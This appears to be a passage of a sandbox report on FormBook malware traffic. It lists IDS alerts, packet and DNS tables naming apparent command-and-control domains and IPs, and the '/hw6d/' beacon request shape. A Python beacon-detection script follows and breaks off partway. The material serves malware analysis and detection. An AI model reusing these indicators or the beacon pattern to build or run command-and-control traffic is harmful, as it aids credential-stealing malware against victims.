                                                                            04/08/21-12:39:38.152108  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4     156.241.53.253
                                                                            04/08/21-12:39:38.152108  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4     156.241.53.253

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                            Apr 8, 2021 12:38:24.267389059 CEST  49742        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:24.281301022 CEST  80           49742      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:24.281589031 CEST  49742        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:24.281748056 CEST  49742        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:24.294466019 CEST  80           49742      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:24.397243977 CEST  80           49742      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:24.397293091 CEST  80           49742      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:24.397468090 CEST  49742        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:24.397500038 CEST  49742        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:24.410653114 CEST  80           49742      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:34.576863050 CEST  49755        80         192.168.2.4      192.187.111.219
                                                                            Apr 8, 2021 12:38:34.700118065 CEST  80           49755      192.187.111.219  192.168.2.4
                                                                            Apr 8, 2021 12:38:34.700261116 CEST  49755        80         192.168.2.4      192.187.111.219
                                                                            Apr 8, 2021 12:38:34.700460911 CEST  49755        80         192.168.2.4      192.187.111.219
                                                                            Apr 8, 2021 12:38:34.823761940 CEST  80           49755      192.187.111.219  192.168.2.4
                                                                            Apr 8, 2021 12:38:34.838860035 CEST  80           49755      192.187.111.219  192.168.2.4
                                                                            Apr 8, 2021 12:38:34.838900089 CEST  80           49755      192.187.111.219  192.168.2.4
                                                                            Apr 8, 2021 12:38:34.839039087 CEST  49755        80         192.168.2.4      192.187.111.219
                                                                            Apr 8, 2021 12:38:34.839102983 CEST  49755        80         192.168.2.4      192.187.111.219
                                                                            Apr 8, 2021 12:38:34.962363005 CEST  80           49755      192.187.111.219  192.168.2.4
                                                                            Apr 8, 2021 12:38:39.914177895 CEST  49756        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:39.926671028 CEST  80           49756      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:39.929672003 CEST  49756        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:39.930010080 CEST  49756        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:39.942357063 CEST  80           49756      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:40.043973923 CEST  80           49756      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:40.043994904 CEST  80           49756      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:40.044217110 CEST  49756        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:40.044251919 CEST  49756        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:38:40.056862116 CEST  80           49756      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:38:50.210047960 CEST  49762        80         192.168.2.4      35.246.6.109
                                                                            Apr 8, 2021 12:38:50.240947962 CEST  80           49762      35.246.6.109     192.168.2.4
                                                                            Apr 8, 2021 12:38:50.241103888 CEST  49762        80         192.168.2.4      35.246.6.109
                                                                            Apr 8, 2021 12:38:50.241262913 CEST  49762        80         192.168.2.4      35.246.6.109
                                                                            Apr 8, 2021 12:38:50.271555901 CEST  80           49762      35.246.6.109     192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309286118 CEST  80           49762      35.246.6.109     192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309360981 CEST  80           49762      35.246.6.109     192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309541941 CEST  49762        80         192.168.2.4      35.246.6.109
                                                                            Apr 8, 2021 12:38:50.309573889 CEST  49762        80         192.168.2.4      35.246.6.109
                                                                            Apr 8, 2021 12:38:50.339886904 CEST  80           49762      35.246.6.109     192.168.2.4
                                                                            Apr 8, 2021 12:38:55.551151037 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.586055994 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.586220980 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.586497068 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.621377945 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621433973 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621483088 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621500015 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621515036 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621534109 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621668100 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.621711016 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.621711016 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621767998 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.621783018 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621831894 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:38:55.621857882 CEST  80           49763      52.128.23.153    192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621900082 CEST  49763        80         192.168.2.4      52.128.23.153
                                                                            Apr 8, 2021 12:39:00.696053028 CEST  49764        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:39:00.708359003 CEST  80           49764      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:39:00.708455086 CEST  49764        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:39:00.714993954 CEST  49764        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:39:00.727948904 CEST  80           49764      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894391060 CEST  80           49764      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894444942 CEST  80           49764      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894572020 CEST  49764        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:39:00.894665003 CEST  49764        80         192.168.2.4      34.102.136.180
                                                                            Apr 8, 2021 12:39:00.907676935 CEST  80           49764      34.102.136.180   192.168.2.4
                                                                            Apr 8, 2021 12:39:11.041254044 CEST  49765        80         192.168.2.4      81.169.145.150
                                                                            Apr 8, 2021 12:39:11.062413931 CEST  80           49765      81.169.145.150   192.168.2.4
                                                                            Apr 8, 2021 12:39:11.062693119 CEST  49765        80         192.168.2.4      81.169.145.150
                                                                            Apr 8, 2021 12:39:11.062895060 CEST  49765        80         192.168.2.4      81.169.145.150
                                                                            Apr 8, 2021 12:39:11.082779884 CEST  80           49765      81.169.145.150   192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085100889 CEST  80           49765      81.169.145.150   192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085124016 CEST  80           49765      81.169.145.150   192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085372925 CEST  49765        80         192.168.2.4      81.169.145.150
                                                                            Apr 8, 2021 12:39:11.085458040 CEST  49765        80         192.168.2.4      81.169.145.150
                                                                            Apr 8, 2021 12:39:11.106547117 CEST  80           49765      81.169.145.150   192.168.2.4
                                                                            Apr 8, 2021 12:39:16.161201000 CEST  49768        80         192.168.2.4      198.54.117.218
                                                                            Apr 8, 2021 12:39:16.335577965 CEST  80           49768      198.54.117.218   192.168.2.4
                                                                            Apr 8, 2021 12:39:16.335829020 CEST  49768        80         192.168.2.4      198.54.117.218
                                                                            Apr 8, 2021 12:39:16.335943937 CEST  49768        80         192.168.2.4      198.54.117.218
                                                                            Apr 8, 2021 12:39:16.510284901 CEST  80           49768      198.54.117.218   192.168.2.4
                                                                            Apr 8, 2021 12:39:16.510302067 CEST  80           49768      198.54.117.218   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.189635992 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.346533060 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.346679926 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.346791029 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.503705978 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504084110 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504101038 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504113913 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504339933 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.504389048 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.504457951 CEST  49769        80         192.168.2.4      107.178.109.19
                                                                            Apr 8, 2021 12:39:27.661621094 CEST  80           49769      107.178.109.19   192.168.2.4
                                                                            Apr 8, 2021 12:39:32.648036003 CEST  49770        80         192.168.2.4      35.208.69.149
                                                                            Apr 8, 2021 12:39:32.784075022 CEST804977035.208.69.149192.168.2.4
                                                                            Apr 8, 2021 12:39:32.784219027 CEST4977080192.168.2.435.208.69.149
                                                                            Apr 8, 2021 12:39:32.784507990 CEST4977080192.168.2.435.208.69.149

UDP Packets

Timestamp                            Source Port  Dest Port    Source IP         Dest IP
Apr 8, 2021 12:37:27.507100105 CEST  53723        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:27.519745111 CEST  53           53723        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:27.784338951 CEST  64646        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:27.796869993 CEST  53           64646        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:28.581459999 CEST  65298        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:28.593924999 CEST  53           65298        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:29.657860994 CEST  59123        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:29.670641899 CEST  53           59123        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:29.981204033 CEST  54531        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:29.999485970 CEST  53           54531        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:30.418566942 CEST  49714        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:30.431118965 CEST  53           49714        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:31.357263088 CEST  58028        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:31.369991064 CEST  53           58028        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:35.394422054 CEST  53097        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:35.407789946 CEST  53           53097        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:36.219094992 CEST  49257        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:36.232076883 CEST  53           49257        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:37.390362024 CEST  62389        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:37.403179884 CEST  53           62389        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:38.699428082 CEST  49910        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:38.712059021 CEST  53           49910        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:40.352055073 CEST  55854        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:40.363943100 CEST  53           55854        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:41.061625004 CEST  64549        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:41.074143887 CEST  53           64549        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:42.988286972 CEST  63153        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:43.001677036 CEST  53           63153        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:43.792480946 CEST  52991        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:43.804896116 CEST  53           52991        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:44.746792078 CEST  53700        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:44.758867979 CEST  53           53700        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:45.413192987 CEST  51726        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:45.425949097 CEST  53           51726        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:57.050118923 CEST  56794        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:57.063385010 CEST  53           56794        8.8.8.8           192.168.2.4
Apr 8, 2021 12:37:58.822794914 CEST  56534        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:37:58.836508989 CEST  53           56534        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:00.244445086 CEST  56627        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:00.257817030 CEST  53           56627        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:02.963752985 CEST  56621        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:02.976217031 CEST  53           56621        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:13.688766956 CEST  63116        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:13.707421064 CEST  53           63116        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:17.025027990 CEST  64078        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:17.037996054 CEST  53           64078        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:17.884820938 CEST  64801        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:17.897609949 CEST  53           64801        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:24.219710112 CEST  61721        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:24.261137009 CEST  53           61721        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:27.240782022 CEST  51255        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:27.258912086 CEST  53           51255        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:28.464804888 CEST  61522        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:28.598004103 CEST  53           61522        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:29.261529922 CEST  52337        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:29.275113106 CEST  53           52337        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:29.680192947 CEST  55046        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:29.785809994 CEST  53           55046        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:30.074496984 CEST  49612        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:30.344984055 CEST  53           49612        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:30.691864014 CEST  49285        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:30.718132973 CEST  53           49285        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:30.814646959 CEST  50601        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:30.940912962 CEST  53           50601        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:31.370680094 CEST  60875        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:31.383594990 CEST  53           60875        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:31.769354105 CEST  56448        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:31.782504082 CEST  53           56448        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:32.417454004 CEST  59172        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:32.429963112 CEST  53           59172        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:33.160809040 CEST  62420        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:33.173552990 CEST  53           62420        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:33.515496969 CEST  60579        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:33.528354883 CEST  53           60579        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:34.427864075 CEST  50183        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:34.574769020 CEST  53           50183        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:39.878290892 CEST  61531        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:39.912935972 CEST  53           61531        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:41.941878080 CEST  49228        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:41.960880995 CEST  53           49228        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:45.074912071 CEST  59794        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:45.128465891 CEST  53           59794        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:50.151755095 CEST  55916        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:50.188862085 CEST  53           55916        8.8.8.8           192.168.2.4
Apr 8, 2021 12:38:55.348973036 CEST  52752        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:38:55.548890114 CEST  53           52752        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:00.637727022 CEST  60542        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:00.677958965 CEST  53           60542        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:05.919821978 CEST  60689        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:05.954108000 CEST  53           60689        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:10.996496916 CEST  64206        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:11.039007902 CEST  53           64206        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:12.699774027 CEST  50904        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:12.713465929 CEST  53           50904        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:14.408883095 CEST  57525        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:14.435889006 CEST  53           57525        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:16.103792906 CEST  53814        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:16.159928083 CEST  53           53814        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:21.527534962 CEST  53418        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:21.969950914 CEST  53           53418        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:27.009428978 CEST  62833        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:27.187257051 CEST  53           62833        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:32.518502951 CEST  59260        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:32.646044970 CEST  53           59260        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:37.936652899 CEST  49944        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:37.961947918 CEST  53           49944        8.8.8.8           192.168.2.4
Apr 8, 2021 12:39:43.667807102 CEST  63300        53           192.168.2.4       8.8.8.8
Apr 8, 2021 12:39:43.992666960 CEST  53           63300        8.8.8.8           192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                             Type            Class
Apr 8, 2021 12:38:24.219710112 CEST  192.168.2.4  8.8.8.8  0xf805    Standard query (0)  www.allwest-originals.com        A (IP address)  IN (0x0001)
Apr 8, 2021 12:38:34.427864075 CEST  192.168.2.4  8.8.8.8  0x8b69    Standard query (0)  www.kathyscrabhouse.com          A (IP address)  IN (0x0001)
Apr 8, 2021 12:38:39.878290892 CEST  192.168.2.4  8.8.8.8  0xf788    Standard query (0)  www.ladybugtubs.com              A (IP address)  IN (0x0001)
Apr 8, 2021 12:38:45.074912071 CEST  192.168.2.4  8.8.8.8  0xf5d9    Standard query (0)  www.wellalytics.com              A (IP address)  IN (0x0001)
Apr 8, 2021 12:38:50.151755095 CEST  192.168.2.4  8.8.8.8  0xc049    Standard query (0)  www.organicfarmteam.com          A (IP address)  IN (0x0001)
Apr 8, 2021 12:38:55.348973036 CEST  192.168.2.4  8.8.8.8  0x1968    Standard query (0)  www.neutrasystems.com            A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:00.637727022 CEST  192.168.2.4  8.8.8.8  0x2cb9    Standard query (0)  www.specstrii.com                A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:05.919821978 CEST  192.168.2.4  8.8.8.8  0x4741    Standard query (0)  www.loanascustomboutique.com     A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:10.996496916 CEST  192.168.2.4  8.8.8.8  0x412a    Standard query (0)  www.boulderhalle-hamburg.com     A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:16.103792906 CEST  192.168.2.4  8.8.8.8  0x636c    Standard query (0)  www.thenewyorker.computer        A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:21.527534962 CEST  192.168.2.4  8.8.8.8  0x4a1f    Standard query (0)  www.themusasoficial.com          A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:27.009428978 CEST  192.168.2.4  8.8.8.8  0x7941    Standard query (0)  www.osaka-computer.net           A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:32.518502951 CEST  192.168.2.4  8.8.8.8  0xb4f3    Standard query (0)  www.werealestatephotography.com  A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:37.936652899 CEST  192.168.2.4  8.8.8.8  0x50c1    Standard query (0)  www.dfch18.com                   A (IP address)  IN (0x0001)
Apr 8, 2021 12:39:43.667807102 CEST  192.168.2.4  8.8.8.8  0xf0f4    Standard query (0)  www.carsoncredittx.com           A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code          Name                               CName                              Address          Type                    Class
Apr 8, 2021 12:38:24.261137009 CEST  8.8.8.8    192.168.2.4  0xf805    No error (0)        www.allwest-originals.com          allwest-originals.com              -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:24.261137009 CEST  8.8.8.8    192.168.2.4  0xf805    No error (0)        allwest-originals.com              -                                  34.102.136.180   A (IP address)          IN (0x0001)
Apr 8, 2021 12:38:34.574769020 CEST  8.8.8.8    192.168.2.4  0x8b69    No error (0)        www.kathyscrabhouse.com            -                                  192.187.111.219  A (IP address)          IN (0x0001)
Apr 8, 2021 12:38:39.912935972 CEST  8.8.8.8    192.168.2.4  0xf788    No error (0)        www.ladybugtubs.com                ladybugtubs.com                    -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:39.912935972 CEST  8.8.8.8    192.168.2.4  0xf788    No error (0)        ladybugtubs.com                    -                                  34.102.136.180   A (IP address)          IN (0x0001)
Apr 8, 2021 12:38:45.128465891 CEST  8.8.8.8    192.168.2.4  0xf5d9    Name error (3)      www.wellalytics.com                none                               none             A (IP address)          IN (0x0001)
Apr 8, 2021 12:38:50.188862085 CEST  8.8.8.8    192.168.2.4  0xc049    No error (0)        www.organicfarmteam.com            www44.wixdns.net                   -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:50.188862085 CEST  8.8.8.8    192.168.2.4  0xc049    No error (0)        www44.wixdns.net                   balancer.wixdns.net                -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:50.188862085 CEST  8.8.8.8    192.168.2.4  0xc049    No error (0)        balancer.wixdns.net                5f36b111-balancer.wixdns.net       -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:50.188862085 CEST  8.8.8.8    192.168.2.4  0xc049    No error (0)        5f36b111-balancer.wixdns.net       td-balancer-euw2-6-109.wixdns.net  -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:38:50.188862085 CEST  8.8.8.8    192.168.2.4  0xc049    No error (0)        td-balancer-euw2-6-109.wixdns.net  -                                  35.246.6.109     A (IP address)          IN (0x0001)
Apr 8, 2021 12:38:55.548890114 CEST  8.8.8.8    192.168.2.4  0x1968    No error (0)        www.neutrasystems.com              -                                  52.128.23.153    A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:00.677958965 CEST  8.8.8.8    192.168.2.4  0x2cb9    No error (0)        www.specstrii.com                  specstrii.com                      -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:39:00.677958965 CEST  8.8.8.8    192.168.2.4  0x2cb9    No error (0)        specstrii.com                      -                                  34.102.136.180   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:05.954108000 CEST  8.8.8.8    192.168.2.4  0x4741    Name error (3)      www.loanascustomboutique.com       none                               none             A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:11.039007902 CEST  8.8.8.8    192.168.2.4  0x412a    No error (0)        www.boulderhalle-hamburg.com       boulderhalle-hamburg.com           -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:39:11.039007902 CEST  8.8.8.8    192.168.2.4  0x412a    No error (0)        boulderhalle-hamburg.com           -                                  81.169.145.150   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        www.thenewyorker.computer          parkingpage.namecheap.com          -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.218   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.217   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.211   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.215   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.212   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.210   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:16.159928083 CEST  8.8.8.8    192.168.2.4  0x636c    No error (0)        parkingpage.namecheap.com          -                                  198.54.117.216   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:21.969950914 CEST  8.8.8.8    192.168.2.4  0x4a1f    Server failure (2)  www.themusasoficial.com            none                               none             A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:27.187257051 CEST  8.8.8.8    192.168.2.4  0x7941    No error (0)        www.osaka-computer.net             osaka-computer.net                 -                CNAME (Canonical name)  IN (0x0001)
Apr 8, 2021 12:39:27.187257051 CEST  8.8.8.8    192.168.2.4  0x7941    No error (0)        osaka-computer.net                 -                                  107.178.109.19   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:32.646044970 CEST  8.8.8.8    192.168.2.4  0xb4f3    No error (0)        www.werealestatephotography.com    -                                  35.208.69.149    A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:37.961947918 CEST  8.8.8.8    192.168.2.4  0x50c1    No error (0)        www.dfch18.com                     -                                  156.241.53.253   A (IP address)          IN (0x0001)
Apr 8, 2021 12:39:43.992666960 CEST  8.8.8.8    192.168.2.4  0xf0f4    No error (0)        www.carsoncredittx.com             -                                  192.155.168.82   A (IP address)          IN (0x0001)

HTTP Request Dependency Graph

• www.allwest-originals.com
• www.kathyscrabhouse.com
• www.ladybugtubs.com
• www.organicfarmteam.com
• www.neutrasystems.com
• www.specstrii.com
• www.boulderhalle-hamburg.com
• www.thenewyorker.computer
• www.osaka-computer.net
• www.werealestatephotography.com
• www.dfch18.com
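The DNS Queries table above shows one new name resolved roughly every five seconds, and the HTTP Packets sessions below show explorer.exe sending the same GET /hw6d/?DnbLu=...&EzuxZl=3fX4qpLxXJu request shape to each resolved host. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not FormBook code. It turns those two observations into detection logic: a regularity score over the inter-query gaps, and a grouping of GET requests by (process, path, parameter names, trailing parameter value) across distinct hosts. The DNS_QUERIES and HTTP_REQUESTS inputs are constructed from the report's own tables (the firefox.exe line is a constructed benign control), and the tolerance and min_hosts thresholds are assumptions.

```python
"""Beacon-shape checks over the DNS and HTTP activity recorded in this report.

Added example, not part of the Joe Sandbox report. Sample inputs are
constructed from the report's DNS Queries and HTTP Packets tables; the
firefox.exe request is a constructed benign control. Thresholds are
assumptions for illustration.
"""
from datetime import datetime
from statistics import median
from urllib.parse import parse_qsl, urlsplit

# Constructed from the DNS Queries table: (timestamp, queried name).
DNS_QUERIES = [
    ("Apr 8, 2021 12:38:24.219710112", "www.allwest-originals.com"),
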